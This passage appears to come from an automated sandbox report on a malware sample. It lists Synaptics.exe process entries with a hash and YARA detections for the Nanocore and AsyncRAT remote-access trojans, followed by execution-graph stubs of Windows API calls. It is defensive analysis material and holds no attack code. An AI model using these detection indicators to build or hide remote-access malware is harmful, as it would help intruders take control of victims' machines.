                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000002.526573354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.383936753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.381548795.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.382444300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:21
                                                  Start time:02:40:17
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Imagebase:0xe40000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.389965974.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.386302469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.381765881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.384393929.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.382689406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:23
                                                  Start time:02:40:21
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Imagebase:0x8b0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.396965179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.390367257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.388606290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.403730358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.400267484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                    Execution Graph

                                                    Execution Coverage:13%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:121
                                                    Total number of Limit Nodes:6
                                                    execution_graph 16808 fcfef8 SetWindowLongW 16809 fcff6c 16808->16809 16933 fc9168 16937 fc924f 16933->16937 16942 fc9260 16933->16942 16934 fc9177 16938 fc9273 16937->16938 16939 fc9283 16938->16939 16947 fc98f0 16938->16947 16951 fc98e0 16938->16951 16939->16934 16943 fc9273 16942->16943 16944 fc9283 16943->16944 16945 fc98f0 LoadLibraryExW 16943->16945 16946 fc98e0 LoadLibraryExW 16943->16946 16944->16934 16945->16944 16946->16944 16948 fc9904 16947->16948 16949 fc9929 16948->16949 16955 fc9450 16948->16955 16949->16939 16952 fc9904 16951->16952 16953 fc9929 16952->16953 16954 fc9450 LoadLibraryExW 16952->16954 16953->16939 16954->16953 16957 fc9ad0 LoadLibraryExW 16955->16957 16958 fc9b49 16957->16958 16958->16949 16959 fc9848 16960 fc988a 16959->16960 16961 fc9890 GetModuleHandleW 16959->16961 16960->16961 16962 fc98bd 16961->16962 16810 fc40d0 16811 fc40da 16810->16811 16815 fc41c1 16810->16815 16820 fc3c64 16811->16820 16813 fc40f5 16816 fc41e5 16815->16816 16824 fc42c0 16816->16824 16828 fc42b1 16816->16828 16821 fc3c6f 16820->16821 16822 fc69dd 16821->16822 16836 fc5184 16821->16836 16822->16813 16826 fc42e7 16824->16826 16825 fc43c4 16825->16825 16826->16825 16832 fc3de4 16826->16832 16830 fc42e7 16828->16830 16829 fc43c4 16829->16829 16830->16829 16831 fc3de4 CreateActCtxA 16830->16831 16831->16829 16833 fc5350 CreateActCtxA 16832->16833 16835 fc5413 16833->16835 16837 fc518f 16836->16837 16840 fc57d8 16837->16840 16839 fc6a7d 16839->16822 16841 fc57e3 16840->16841 16844 fc5808 16841->16844 16843 fc6b5a 16843->16839 16845 fc5813 16844->16845 16848 fc5838 16845->16848 16847 fc6c4a 16847->16843 16850 fc5843 16848->16850 16849 fc739c 16849->16847 16850->16849 16853 fcb280 16850->16853 16858 fcb270 16850->16858 16854 fcb2a1 16853->16854 16855 fcb2c5 16854->16855 16863 fcb538 16854->16863 16867 fcb528 16854->16867 16855->16849 16859 fcb2a1 16858->16859 16860 fcb2c5 16859->16860 16861 fcb538 2 API calls 16859->16861 16862 fcb528 2 API calls 16859->16862 16860->16849 16861->16860 16862->16860 16864 fcb545 16863->16864 16866 fcb57f 16864->16866 16871 fc9750 16864->16871 16866->16855 16868 fcb545 16867->16868 16869 fcb57f 16868->16869 16870 fc9750 2 API calls 16868->16870 16869->16855 16870->16869 16872 fc975b 16871->16872 16874 fcc278 16872->16874 16875 fc9818 16872->16875 16874->16874 16876 fc9823 16875->16876 16877 fc5838 2 API calls 16876->16877 16878 fcc2e7 16876->16878 16877->16878 16882 fce068 16878->16882 16891 fce058 16878->16891 16879 fcc320 16879->16874 16884 fce099 16882->16884 16886 fce18a 16882->16886 16883 fce0a5 16883->16879 16884->16883 16889 fce4e8 LoadLibraryExW 16884->16889 16890 fce4d7 LoadLibraryExW 16884->16890 16885 fce0e5 16887 fceeb0 CreateWindowExW 16885->16887 16888 fceea1 CreateWindowExW 16885->16888 16886->16879 16887->16886 16888->16886 16889->16885 16890->16885 16893 fce099 16891->16893 16894 fce18a 16891->16894 16892 fce0a5 16892->16879 16893->16892 16898 fce4e8 LoadLibraryExW 16893->16898 16899 fce4d7 LoadLibraryExW 16893->16899 16894->16879 16895 fce0e5 16896 fceeb0 CreateWindowExW 16895->16896 16897 fceea1 CreateWindowExW 16895->16897 16896->16894 16897->16894 16898->16895 16899->16895 16900 fcb650 16901 fcb6b6 16900->16901 16905 fcb810 16901->16905 16908 fcb800 16901->16908 16902 fcb765 16912 fc97d8 16905->16912 16909 fcb805 16908->16909 16910 fcb83e 16909->16910 16911 fc97d8 DuplicateHandle 16909->16911 16910->16902 16911->16910 16913 fcb878 DuplicateHandle 16912->16913 16914 fcb83e 16913->16914 16914->16902 16915 5050be8 16916 5050c15 16915->16916 16917 5050c47 16916->16917 16919 5050d70 16916->16919 16921 5050d84 16919->16921 16920 5050e10 16920->16917 16923 5050e28 16921->16923 16924 5050e39 16923->16924 16926 50522c3 16923->16926 16924->16920 16929 50522f0 16926->16929 16930 5052332 16929->16930 16932 50522da 16929->16932 16931 505238a CallWindowProcW 16930->16931 16930->16932 16931->16932 16932->16924

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 96 fcdd70-fcfd1e 100 fcfd29-fcfd30 96->100 101 fcfd20-fcfd26 96->101 102 fcfd3b-fcfd73 100->102 103 fcfd32-fcfd38 100->103 101->100 104 fcfd7b-fcfdda CreateWindowExW 102->104 103->102 105 fcfddc-fcfde2 104->105 106 fcfde3-fcfe1b 104->106 105->106 110 fcfe1d-fcfe20 106->110 111 fcfe28 106->111 110->111 112 fcfe29 111->112 112->112
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FCFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 64d27c9444c67399f7570bcf10ea97d3a345d50affdb181cff5f59f3740a820f
                                                    • Instruction ID: 74c067561decdeaa31edd7dfa2ba7f0758d2eac6de3e3f5bec05e8ba7f7660de
                                                    • Opcode Fuzzy Hash: 64d27c9444c67399f7570bcf10ea97d3a345d50affdb181cff5f59f3740a820f
                                                    • Instruction Fuzzy Hash: 9D51EFB1C003499FDB15CFA9C984ADEFFB6BF48314F24852AE409AB261D7749849CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 113 fcdd8c-fcfd1e 115 fcfd29-fcfd30 113->115 116 fcfd20-fcfd26 113->116 117 fcfd3b-fcfdda CreateWindowExW 115->117 118 fcfd32-fcfd38 115->118 116->115 120 fcfddc-fcfde2 117->120 121 fcfde3-fcfe1b 117->121 118->117 120->121 125 fcfe1d-fcfe20 121->125 126 fcfe28 121->126 125->126 127 fcfe29 126->127 127->127
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FCFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: babc3e9e87630d2d802d72f165071d1348af38d5dc855156481ad4a8163f0cd5
                                                    • Instruction ID: 4f39dedc8b95cebbbe6f31cbcfbaf887caee26ef3f53f9b4dcb0a9f32079ec78
                                                    • Opcode Fuzzy Hash: babc3e9e87630d2d802d72f165071d1348af38d5dc855156481ad4a8163f0cd5
                                                    • Instruction Fuzzy Hash: 9951C2B1D003099FDF14CF99D984ADEFBB6BF48314F24852AE819AB250D7749945CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 128 fcfcac-fcfd1e 129 fcfd29-fcfd30 128->129 130 fcfd20-fcfd26 128->130 131 fcfd3b-fcfd73 129->131 132 fcfd32-fcfd38 129->132 130->129 133 fcfd7b-fcfdda CreateWindowExW 131->133 132->131 134 fcfddc-fcfde2 133->134 135 fcfde3-fcfe1b 133->135 134->135 139 fcfe1d-fcfe20 135->139 140 fcfe28 135->140 139->140 141 fcfe29 140->141 141->141
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FCFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: cffe4ae89c9d277502db9df5b7e37c4007ffb2603d8561cff724bba2f9e3d007
                                                    • Instruction ID: d0a9965c988c30999332695ba762becbb4713dc0f4cb54c09107a766302ffde4
                                                    • Opcode Fuzzy Hash: cffe4ae89c9d277502db9df5b7e37c4007ffb2603d8561cff724bba2f9e3d007
                                                    • Instruction Fuzzy Hash: 6C51D1B1D003099FDF14CFA9D985ADEFBB6BF48310F24862AE419AB250D7749949CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 142 fc5345-fc5411 CreateActCtxA 144 fc541a-fc5474 142->144 145 fc5413-fc5419 142->145 152 fc5476-fc5479 144->152 153 fc5483-fc5487 144->153 145->144 152->153 154 fc5498 153->154 155 fc5489-fc5495 153->155 157 fc5499 154->157 155->154 157->157
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00FC5401
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: f5ae0f991479be9e54cb3c99a922ca220592a9ca4b2836b763a153cc549d2dbe
                                                    • Instruction ID: 53057b62e2ffc9f28b2cb3ab9293ffc1e5a5482075e6d6e58a6f8bde4734aae1
                                                    • Opcode Fuzzy Hash: f5ae0f991479be9e54cb3c99a922ca220592a9ca4b2836b763a153cc549d2dbe
                                                    • Instruction Fuzzy Hash: 1341E371C00619CFDF24CFA9C985BDDBBB5BF49308F248469D448AB251DB71698ACF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 158 fc3de4-fc5411 CreateActCtxA 161 fc541a-fc5474 158->161 162 fc5413-fc5419 158->162 169 fc5476-fc5479 161->169 170 fc5483-fc5487 161->170 162->161 169->170 171 fc5498 170->171 172 fc5489-fc5495 170->172 174 fc5499 171->174 172->171 174->174
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00FC5401
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: a0abbc1112016a559686c8e3c8434b4ec6c970f4cb19dc0958166316dcc9d4c2
                                                    • Instruction ID: 26b7b73718bbb00e3f86685ac62a9af89eaddcb14b435189a3ff9d56cbf2e259
                                                    • Opcode Fuzzy Hash: a0abbc1112016a559686c8e3c8434b4ec6c970f4cb19dc0958166316dcc9d4c2
                                                    • Instruction Fuzzy Hash: 7A41F471C00619CBDF24CF99C985BCDBBB5FF45708F208469D408AB251D7756986CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 175 50522f0-505232c 176 5052332-5052337 175->176 177 50523dc-50523fc 175->177 178 5052339-5052370 176->178 179 505238a-50523c2 CallWindowProcW 176->179 183 50523ff-505240c 177->183 186 5052372-5052378 178->186 187 5052379-5052388 178->187 180 50523c4-50523ca 179->180 181 50523cb-50523da 179->181 180->181 181->183 186->187 187->183
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 050523B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.341471906.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5050000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 09864eafbaa4b83c10b135b82333588a13bad421adb3cd4b67f3759e5b148fd5
                                                    • Instruction ID: d19b6d492ef59cf93bea74272fdacae67a9935b40b3b03c318f3d79b9aa2f7a9
                                                    • Opcode Fuzzy Hash: 09864eafbaa4b83c10b135b82333588a13bad421adb3cd4b67f3759e5b148fd5
                                                    • Instruction Fuzzy Hash: 2F4148B89002459FDB14CF99D588AAFBBF5FF89324F248459D919AB321D374A841CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 189 fc97d8-fcb90c DuplicateHandle 191 fcb90e-fcb914 189->191 192 fcb915-fcb932 189->192 191->192
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FCB83E,?,?,?,?,?), ref: 00FCB8FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: a0a1e95c12b241dfc5d13b4c3b4ae5c5ce8cf637b25c7ec21158baf0a2a8761b
                                                    • Instruction ID: 7b231a315b2f666c59b502b21b164412bfb5a522170c894c3226fc36f2a9e3b9
                                                    • Opcode Fuzzy Hash: a0a1e95c12b241dfc5d13b4c3b4ae5c5ce8cf637b25c7ec21158baf0a2a8761b
                                                    • Instruction Fuzzy Hash: CD21E6B5900209AFDB10CF99D985BDEBBF8FB48324F14842AE955B3350D374A944DFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 195 fcb873-fcb90c DuplicateHandle 196 fcb90e-fcb914 195->196 197 fcb915-fcb932 195->197 196->197
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FCB83E,?,?,?,?,?), ref: 00FCB8FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 541fec8e0b81d8861fd4397124115bceee2709a577bb3f5a994a54a909c67b31
                                                    • Instruction ID: f17d7997ff4991ffcb521fc8221c7cd40012841d6d8132cf870d106c02a808d4
                                                    • Opcode Fuzzy Hash: 541fec8e0b81d8861fd4397124115bceee2709a577bb3f5a994a54a909c67b31
                                                    • Instruction Fuzzy Hash: C721E4B5D01209AFDB10CFA9D985ADEBBF4EB48324F14842AE959A3310D374A945CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 200 fc9450-fc9b10 202 fc9b18-fc9b47 LoadLibraryExW 200->202 203 fc9b12-fc9b15 200->203 204 fc9b49-fc9b4f 202->204 205 fc9b50-fc9b6d 202->205 203->202 204->205
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FC9929,00000800,00000000,00000000), ref: 00FC9B3A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 6315d3c44bf03d8d8e6bb3b8de3fb39cddd0b93c9cb1394b459dec26361563bf
                                                    • Instruction ID: 504f07e6b4d4aa2fad92151e6bd1248eea50f3a515e4515a029e5fb55cb4ec61
                                                    • Opcode Fuzzy Hash: 6315d3c44bf03d8d8e6bb3b8de3fb39cddd0b93c9cb1394b459dec26361563bf
                                                    • Instruction Fuzzy Hash: C011F2B29042099BDB14CF9AD548BDEBBF4EB88324F14852EE519A7610C3B4A945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 208 fc9ac9-fc9b10 209 fc9b18-fc9b47 LoadLibraryExW 208->209 210 fc9b12-fc9b15 208->210 211 fc9b49-fc9b4f 209->211 212 fc9b50-fc9b6d 209->212 210->209 211->212
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FC9929,00000800,00000000,00000000), ref: 00FC9B3A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: c75b649c219b99896a0b162fc0f5024cf5e4796cab2c3aa08643b56e735aad34
                                                    • Instruction ID: 228e12b6a0268cdc7a3b665da72b66e4a68f19a97078e45f80c8d8e968271470
                                                    • Opcode Fuzzy Hash: c75b649c219b99896a0b162fc0f5024cf5e4796cab2c3aa08643b56e735aad34
